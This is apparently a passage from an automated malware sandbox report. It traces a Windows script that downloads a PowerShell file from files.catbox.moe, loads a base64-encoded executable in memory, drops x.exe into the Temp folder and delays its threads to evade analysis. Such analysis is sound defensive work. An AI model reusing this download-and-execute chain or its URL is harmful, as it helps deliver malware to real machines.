a1:%22C%3A%5CTemp%5Cdddddd.ps1%22");ITextStream.WriteLine(" exec:55 f:DownloadScript");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:62 o: f:Open a0:%22GET%22 a1:%22https%3A%2F%2Ffiles.catbox.moe%2Fugok5m.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "https://files.catbox.moe/ugok5m.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:62 o: f:Open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:71 o: f:Send");IServerXMLHTTPRequest2.send();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\1484.js.csv");IHost.Name();ITextStream.WriteLine(" entry:19 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:19 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:26 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:26 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:33 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:33 o:Windows%20Script%20Host f:CreateObject r:");IFileSystem3._00000000();ITextStream.WriteLine(" entry:42 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:42 o: f:FolderExists r:false");IFileSystem3._00000
          Source: x.exe.1.dr, GnxjtY6uN0ibtr5Aob.cs.Net Code: rLLLEvwNO System.Reflection.Assembly.Load(byte[])
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAA
          Source: x.exe.1.drStatic PE information: 0xD7852304 [Sun Jul 30 20:18:12 2084 UTC]
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00415853 push esi; retf 4_2_0041585E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00403000 push eax; ret 4_2_00403002
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0042381B pushfd ; ret 4_2_00423826
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00424028 push esi; ret 4_2_00424029
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0040A8DB push ds; iretd 4_2_0040A8E3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00418A67 push ebp; retf 4_2_00418A68
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00417213 push esp; ret 4_2_00417262
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0041E23C push es; iretd 4_2_0041E23D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00423ACF push BB700124h; iretd 4_2_00423B42
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0040BAAC push cs; iretd 4_2_0040BAAD
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004143C5 push ds; iretd 4_2_004143C7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00408463 push FFFFFF8Ch; iretd 4_2_0040847E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00423C14 push es; ret 4_2_00423C1A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0041E545 push FFFFFFCCh; retf 4_2_0041E547
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00411D5E push eax; retf 4_2_00411D5F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0041E6C8 push 2147A274h; iretd 4_2_0041E6CD
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00415F53 push esp; retf 4_2_00415F5F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0040C719 push esp; ret 4_2_0040C71E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019809AD push ecx; mov dword ptr [esp], ecx4_2_019809B6
          Source: x.exe.1.dr, GnxjtY6uN0ibtr5Aob.csHigh entropy of concatenated method names: 'rLLLEvwNO', 'RwipenCOw', 'Nd9kNfCgU', 'dbJicOXfI', 'yACInIw9S', 'yMHV51IkZ', 'iGDvq9LvuibvO7CPBM', 'VY5Uqa1ZwOBeqhkQoD', 'onopDFZvpSjdctc7F9', 'nFuKoJnPcmPOFG9TuE'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 4DF0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FD1C0 rdtsc 4_2_019FD1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599219Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598469Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598331Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597985Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597860Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597610Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597360Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597235Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2939Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2974Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 3299Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 1484Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeAPI coverage: 0.7 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3104Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -13835058055282155s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7028Thread sleep count: 3299 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7028Thread sleep count: 1484 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -599328s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -599219s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -599094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -598985s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -598860s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -598735s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -598610s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -598469s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -598331s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -598203s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -598094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -597985s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -597860s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -597735s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -597610s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -597485s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -597360s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808Thread sleep time: -597235s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3704Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3852Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3444Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
